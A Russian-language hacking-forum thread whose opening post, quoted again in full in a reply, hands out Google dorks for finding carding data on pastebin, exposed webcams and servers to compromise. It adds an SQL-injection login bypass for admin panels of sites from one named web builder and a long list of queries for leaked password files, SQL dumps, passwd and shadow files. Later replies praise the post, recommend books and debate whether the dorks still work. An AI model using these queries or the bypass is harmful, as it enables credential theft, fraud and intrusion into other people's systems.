• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Google Hacking или нах! Shoudan?

всем привет! А, Вы писали когда нибудь статью под воздействием наркотиков? Нет..?

Предлогаю оценить сей данный Вам текст, ведь не даром психоделики и всякого рода химия так полюбилась творческим людям! Примеров куча....
Есть такой поисковик жужл, он все знает! Вы скажите да ну нах, что за наркоманский бред?
Ребятки я Вам отвечу забудте что Вы знали про него! Я наблюдал у нас на борде статьи про shoudan типо " самый лютый посковик" типо трепещите простые смертные перед ним, а нихуя жужлик круче!!
У Вас вопрос почему??? Отвечаю, ну вот вам захотелось оплатить что-нить в инете на себя на дропа не важно.. так вот Вам "заклинание" { intext: visa | mastercard site:pastebin.com } и УКАЖИТЕ ВРЕМЯ ЗА ПОСЛЕДНЮЮ НЕДЕЛЮ В (ИНСТРУМЕНТАХ)
Я уверен что к Вашему вниманию представится очень много логов сниферов и всякого рода логов.. где есть полезная инфа! Согласитесь, в в хваленом Шоудане такого не найдешь?
Идем дальше, захотелось Вам например взломать что нить сервер для соксов майнинга и т.д. да и просто по баловать свое самолюбие.. есть заклинание
{ "dirLIST - PHP Directory Lister" "Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx" "index of" ext:php } <<<-- Cтарички меня поймут, про что здесь!))
Продалжаем баловаться хотите Вы к примеру позырить на телок, на работников, на всякую шуету? вот Вам такое заклинание { inurl:/control/userimage.html } типо взлом webcamer))

Это все балавство, ничего серьезного! А вот теперь внимание всем представляю Вам заклинание {Powerd by NetOffica } поясняю эта группа создателей сайтов клепала в свае время сайты на право на лево))
абы збыть и закрыть заказ , безопасность им была по-уй.. абы денег срубить..), так вот они упустили момент такой- что в админ панель (ну вы знаете) можно зайти просто.
Username: '=' 'or'
password: '=' 'or'

и таких примеров я Вам могу предоставить кучу!
Итог учите google hacking! а именно @ля забыл..... как это слово называется индексы ......а точно "операторы" гугл !! (вспоминал 5 минут) ну и на последок ДАРЫ так сказать..))

************************
** FTP PASSWORD DORKS **
************************

+htpasswd +WS_FTP.LOG filetype:log

"index of/" "ws_ftp.ini" "parent directory"

Substitute vulnerablesite.com with your site you want to search)
"allinurl: "Vulnerablesite.com" WS_FTP.LOG filetype:log"



*****************************
** SQL PASSWORD DUMP DORKS **
*****************************

1.) SQL dumps saved to database search. (Some of the more common passwords for you):

a.) "123456" = hashed password
ext:sql intext:mad:gmail.com intext:e10adc3949ba59abbe56e057f20f883e

b.) "654321" = hashed password
ext:sql intext:mad:gmail.com intext:c33367701511b4f6020ec61ded352059

c.) "password" = hashed password
ext:sql intext:mad:gmail.com intext:5f4dcc3b5aa765d61d8327deb882cf99

d.) "12345678" = hashed password
ext:sql intext:mad:gmail.com intext:25d55ad283aa400af464c76d713c07ad

e.) "iloveyou" = hashed password
ext:sql intext:mad:gmail.com intext:f25a2fc72690b780b2a14e140ef6a9e0


2.) Variation of above search:

a.) ext:sql intext:"INSERT INTO" intext:mad:gmail.com intext:password

b.) ext:sql intext:"INSERT INTO" intext:mad:yahoo.com intext:password

c.) ext:sql intext:"INSERT INTO" intext:mad:hotmail.com intext:password

d.) ext:sql intext:"INSERT INTO" intext:mad:att.net intext:password

e.) ext:sql intext:"INSERT INTO" intext:mad:comcast.net intext:password

f.) ext:sql intext:"INSERT INTO" intext:mad:verizon.net intext:password



*************************
** PASSWORD FILE DORKS **
*************************

1.) Search for Microsoft Excel data file:

"Login: *" "password =*" filetype: xls


2.) Search for auth_user_file:

allinurl: auth_user_file.txt


3.) Search for username/password saved in Microsoft Excel files:

filetype: xls inurl: "password.xls"


4.) Search for login pages:

intitle: login password


5.) Search for "master password" page:

intitle: "Index of" master.passwd


6.) Search for backup directory:

index of /backup


7.) Search for password backup file index:

intitle:index.of passwd.bak


8.) Search for password databases:

intitle:index.of pwd.db

intitle:"index of" pwd.db


9.) Search for /etc/passwd/ index:

intitle:"index of .. etc" passwd


10.) Search for plaintext password file:

index.of passlist.txt

inurl:passlist.txt


11.) Search for hidden documents/password files:

index.of.secret

index.of.private


12.) Search for PhpMyAdmin files:

"# PhpMyAdmin MySQL-Dump" filetype: txt


13.) Hidden Superuser (root) data files:

inurl:ipsec.secrets-history-bugs

inurl:ipsec.secrets "holds shared secrets"


14.) Find the information files:

inurl:ipsec.conf-intitle:manpage


15.) Search for a stored password in a database:

filetype:ldb admin


16.) Search for admin.php file:

inurl:search/admin.php


17.) Search for password log files:

inurl:password.log filetype:log


18.) Search for Hkey_Current_User in registry files:

filetype: reg HKEY_CURRENT_USER username


19.) Search for username/password file backups:

" : password @ www ..." filetype: bak inurl: "htaccess | passwd | shadow | ht users"


20.) Search for username/password files:

filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files


21.) Search for Microsoft Frontpage passwords:

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”


22.) Search for SQL database Code and passwords:

filetype: sql ( "passwd values ****" |" password values ****" | "pass values ****")


23.) Search for e-mail account files:

intitle: "Index Of"-inurl: maillog
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
1
Жжёшь,Брат, классически. Интересно читать.
 
  • Нравится
Реакции: wonalive
K

Kilimangaro7777

всем привет! А, Вы писали когда нибудь статью под воздействием наркотиков? Нет..?

Предлогаю оценить сей данный Вам текст, ведь не даром психоделики и всякого рода химия так полюбилась творческим людям! Примеров куча....
Есть такой поисковик жужл, он все знает! Вы скажите да ну нах, что за наркоманский бред?
Ребятки я Вам отвечу забудте что Вы знали про него! Я наблюдал у нас на борде статьи про shoudan типо " самый лютый посковик" типо трепещите простые смертные перед ним, а нихуя жужлик круче!!
У Вас вопрос почему??? Отвечаю, ну вот вам захотелось оплатить что-нить в инете на себя на дропа не важно.. так вот Вам "заклинание" { intext: visa | mastercard site:pastebin.com } и УКАЖИТЕ ВРЕМЯ ЗА ПОСЛЕДНЮЮ НЕДЕЛЮ В (ИНСТРУМЕНТАХ)
Я уверен что к Вашему вниманию представится очень много логов сниферов и всякого рода логов.. где есть полезная инфа! Согласитесь, в в хваленом Шоудане такого не найдешь?
Идем дальше, захотелось Вам например взломать что нить сервер для соксов майнинга и т.д. да и просто по баловать свое самолюбие.. есть заклинание
{ "dirLIST - PHP Directory Lister" "Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx" "index of" ext:php } <<<-- Cтарички меня поймут, про что здесь!))
Продалжаем баловаться хотите Вы к примеру позырить на телок, на работников, на всякую шуету? вот Вам такое заклинание { inurl:/control/userimage.html } типо взлом webcamer))

Это все балавство, ничего серьезного! А вот теперь внимание всем представляю Вам заклинание {Powerd by NetOffica } поясняю эта группа создателей сайтов клепала в свае время сайты на право на лево))
абы збыть и закрыть заказ , безопасность им была по-уй.. абы денег срубить..), так вот они упустили момент такой- что в админ панель (ну вы знаете) можно зайти просто.
Username: '=' 'or'
password: '=' 'or'

и таких примеров я Вам могу предоставить кучу!
Итог учите google hacking! а именно @ля забыл..... как это слово называется индексы ......а точно "операторы" гугл !! (вспоминал 5 минут) ну и на последок ДАРЫ так сказать..))

************************
** FTP PASSWORD DORKS **
************************

+htpasswd +WS_FTP.LOG filetype:log

"index of/" "ws_ftp.ini" "parent directory"

Substitute vulnerablesite.com with your site you want to search)
"allinurl: "Vulnerablesite.com" WS_FTP.LOG filetype:log"



*****************************
** SQL PASSWORD DUMP DORKS **
*****************************

1.) SQL dumps saved to database search. (Some of the more common passwords for you):

a.) "123456" = hashed password
ext:sql intext:mad:gmail.com intext:e10adc3949ba59abbe56e057f20f883e

b.) "654321" = hashed password
ext:sql intext:mad:gmail.com intext:c33367701511b4f6020ec61ded352059

c.) "password" = hashed password
ext:sql intext:mad:gmail.com intext:5f4dcc3b5aa765d61d8327deb882cf99

d.) "12345678" = hashed password
ext:sql intext:mad:gmail.com intext:25d55ad283aa400af464c76d713c07ad

e.) "iloveyou" = hashed password
ext:sql intext:mad:gmail.com intext:f25a2fc72690b780b2a14e140ef6a9e0


2.) Variation of above search:

a.) ext:sql intext:"INSERT INTO" intext:mad:gmail.com intext:password

b.) ext:sql intext:"INSERT INTO" intext:mad:yahoo.com intext:password

c.) ext:sql intext:"INSERT INTO" intext:mad:hotmail.com intext:password

d.) ext:sql intext:"INSERT INTO" intext:mad:att.net intext:password

e.) ext:sql intext:"INSERT INTO" intext:mad:comcast.net intext:password

f.) ext:sql intext:"INSERT INTO" intext:mad:verizon.net intext:password



*************************
** PASSWORD FILE DORKS **
*************************

1.) Search for Microsoft Excel data file:

"Login: *" "password =*" filetype: xls


2.) Search for auth_user_file:

allinurl: auth_user_file.txt


3.) Search for username/password saved in Microsoft Excel files:

filetype: xls inurl: "password.xls"


4.) Search for login pages:

intitle: login password


5.) Search for "master password" page:

intitle: "Index of" master.passwd


6.) Search for backup directory:

index of /backup


7.) Search for password backup file index:

intitle:index.of passwd.bak


8.) Search for password databases:

intitle:index.of pwd.db

intitle:"index of" pwd.db


9.) Search for /etc/passwd/ index:

intitle:"index of .. etc" passwd


10.) Search for plaintext password file:

index.of passlist.txt

inurl:passlist.txt


11.) Search for hidden documents/password files:

index.of.secret

index.of.private


12.) Search for PhpMyAdmin files:

"# PhpMyAdmin MySQL-Dump" filetype: txt


13.) Hidden Superuser (root) data files:

inurl:ipsec.secrets-history-bugs

inurl:ipsec.secrets "holds shared secrets"


14.) Find the information files:

inurl:ipsec.conf-intitle:manpage


15.) Search for a stored password in a database:

filetype:ldb admin


16.) Search for admin.php file:

inurl:search/admin.php


17.) Search for password log files:

inurl:password.log filetype:log


18.) Search for Hkey_Current_User in registry files:

filetype: reg HKEY_CURRENT_USER username


19.) Search for username/password file backups:

" : password @ www ..." filetype: bak inurl: "htaccess | passwd | shadow | ht users"


20.) Search for username/password files:

filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files


21.) Search for Microsoft Frontpage passwords:

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”


22.) Search for SQL database Code and passwords:

filetype: sql ( "passwd values ****" |" password values ****" | "pass values ****")


23.) Search for e-mail account files:

intitle: "Index Of"-inurl: maillog
Вот читааааю, читаю и не могу нарадоваться!!! Познакомиться хочу! Давно мечтал о знакомстве с таким человеком!!!
 

SlipX

dd if=/dev/random of=/dev/port
Green Team
13.08.2017
135
167
BIT
0
и позновательно и весело)
 

debian2017

Green Team
09.04.2017
42
71
BIT
0
Все бросаю "синьку" перехожу на психотропы) Круто MAN спасибо!!! А вообще в принципе как говорят в народе старый конь борозды не испортит (Dorks) но... и глубоко не вспашет)
 
Последнее редактирование:

SearcherSlava

Red Team
10.06.2017
943
1 259
BIT
113
 11.jpg



 
K

kamaz

жуэел намерено непоказывает сайты заведомо уязвимые
 

SearcherSlava

Red Team
10.06.2017
943
1 259
BIT
113
google-pagerank-kaldirildi.jpg

























Для сравнения поисковых характеристик можете воспользоваться , в данном поисковике, в зависимости от тематики запросов, коэффициент пертинентности, т.е соответствие запроса цели запроса, иногда выше. чем у Google. Также можно почитать труды Johnny Long, ознакомиться с его философией работы в поисковой строке.
 

SearcherSlava

Red Team
10.06.2017
943
1 259
BIT
113
Посмотреть вложение 16474
























Для сравнения поисковых характеристик можете воспользоваться , в данном поисковике, в зависимости от тематики запросов, коэффициент пертинентности, т.е соответствие запроса цели запроса, иногда выше. чем у Google. Также можно почитать труды by Johnny Long, ознакомиться с его философией работы в поисковой строке.







Behind Google's deceptively simple interface is immense power for both market and competitive research—if you know how to use it well. Sure, basic searches are easy, but complex searches require specialized skills. This concise book takes you through the full range of Google's powerful search-refinement features, so you can quickly find the specific information you need. Learn techniques ranging from simple Boolean logic to URL parameters and other advanced tools, and see how they're applied to real-world market research examples.
  • Incorporate advanced search operators such as filetype:, intitle:, daterange:, and others into your queries
  • Use Google filtering tools, including Search Within Results, Similar Pages, and SafeSearch, among others
  • Explore the breadth of Google through auxiliary search services like Google News, Google Books, Google Blog Search, and Google Scholar
  • Acquire advanced Google skills that result in more effective search engine optimization (SEO)

 22.jpg






 

Вложения

  • Stephan Spencer. Google Power Search.pdf
    784,9 КБ · Просмотры: 1 376
Последнее редактирование модератором:
  • Нравится
Реакции: Ванек

☠Script♥Kiddie☠

Вот по такому запросу (20 номер под спойлером)
Код:
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files
теоретически должны выдаваться сылки на файлы users.mdb

Они выдаются.
Но при переходе по ссылкам либо страница недоступна в браузере, либо ссылка ведёт на какую-то тестовую страницу, на которой нет ни логинов, ни паролей.
Все попытки скачать файл users.mdb и "распотрошить" на своём локальном компьютере - безуспешны.
Таким образом, запрос на практике не выдаст никаких логинов и паролей.

Как и большинство запросов, описанных в подобных статьях, посвящённых Гугл-хакингу - этот очередная профанация ))
Пусть кинет в меня камнем тот, кто докажет обратное !
 

SearcherSlava

Red Team
10.06.2017
943
1 259
BIT
113
Вот по такому запросу (20 номер под спойлером)
Код:
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files
теоретически должны выдаваться сылки на файлы users.mdb
Они выдаются.Но при переходе по ссылкам либо страница недоступна в браузере, либо ссылка ведёт на какую-то тестовую страницу, на которой нет ни логинов, ни паролей.Все попытки скачать файл users.mdb и "распотрошить" на своём локальном компьютере - безуспешны.Таким образом, запрос на практике не выдаст никаких логинов и паролей.
Как и большинство запросов, описанных в подобных статьях, посвящённых Гугл-хакингу - этот очередная профанация ))Пусть кинет в меня камнем тот, кто докажет обратное !
@☠Script♥Kiddie☠, здрав будь! Не буду кидаться камнями и доказывать обратное, скажу лишь, что при таком(их) длинных запросах гугл или уточка тебя могут не понять в силу собственных алгоритмов. Вертикальная черта соотв. оператору ИЛИ, она же OR, составляй запросы filetype:xls inurl:login, filetype:xls inurl:username, filetype:xls inurlpassword, inurl:robots.txt, inurl:site filetype:xls"address" и т.д без нее, минимизируя кол-во слов в запросе и фокусируясь на чем-то конкретном.В трудах Джонни Лонга и множестве ресурсов все описано до мельчайших подробностей, главное - начать понимать концепцию и постоянно репетировать, ведь удача любит подготовленных!
 
Последнее редактирование:

SearcherSlava

Red Team
10.06.2017
943
1 259
BIT
113
Посмотреть вложение 16462



Форма бублика зависит от формы дырки в нем!
Не такая уж и старая шляпа, коли в ней могут появляться все новые дырки!
Благоразумный человек, помалкивая в тряпочку, которая внезапно порвалась, будет продолжать помалкивать в дырку от тряпочки.
 

Вложения

  • Boris Koch. Liste-Google-Hacking V.2.1.pdf
    187,3 КБ · Просмотры: 10 357
Последнее редактирование:
  • Нравится
Реакции: id2746 и larchik
В

Ванек

Посмотреть вложение 16462


Вторая ссылка не работает

Посмотреть вложение 16474
























Для сравнения поисковых характеристик можете воспользоваться , в данном поисковике, в зависимости от тематики запросов, коэффициент пертинентности, т.е соответствие запроса цели запроса, иногда выше. чем у Google. Также можно почитать труды Johnny Long, ознакомиться с его философией работы в поисковой строке.
К огроменному сожалению, ни ДакГоу, ни Бинг, ни Яндекс, ни что другое даже рядом Google не валялось. По техническим причинам около четырех месяцев не мог пользоваться поиском Гугла (через общий айпишник постоянно требует капчу и по многу раз подряд). Это просто АДЪ. Все они ищут, да. Но находят херню. А Гугл будто мысли читает, не даром никто дальше второй страницы выдачи никогда не забредает.
 
В

Ванек

Вот по такому запросу (20 номер под спойлером)
Код:
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files
теоретически должны выдаваться сылки на файлы users.mdb

Они выдаются.
Но при переходе по ссылкам либо страница недоступна в браузере, либо ссылка ведёт на какую-то тестовую страницу, на которой нет ни логинов, ни паролей.
Все попытки скачать файл users.mdb и "распотрошить" на своём локальном компьютере - безуспешны.
Таким образом, запрос на практике не выдаст никаких логинов и паролей.

Как и большинство запросов, описанных в подобных статьях, посвящённых Гугл-хакингу - этот очередная профанация ))
Пусть кинет в меня камнем тот, кто докажет обратное !
На самом деле, содержимое php, mdb и подобных типов - отдаётся, но не всегда. От чего зависит - пока не понял. Примеры не приведу, просто делал попытки и *очень* иногда получал содержимое.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!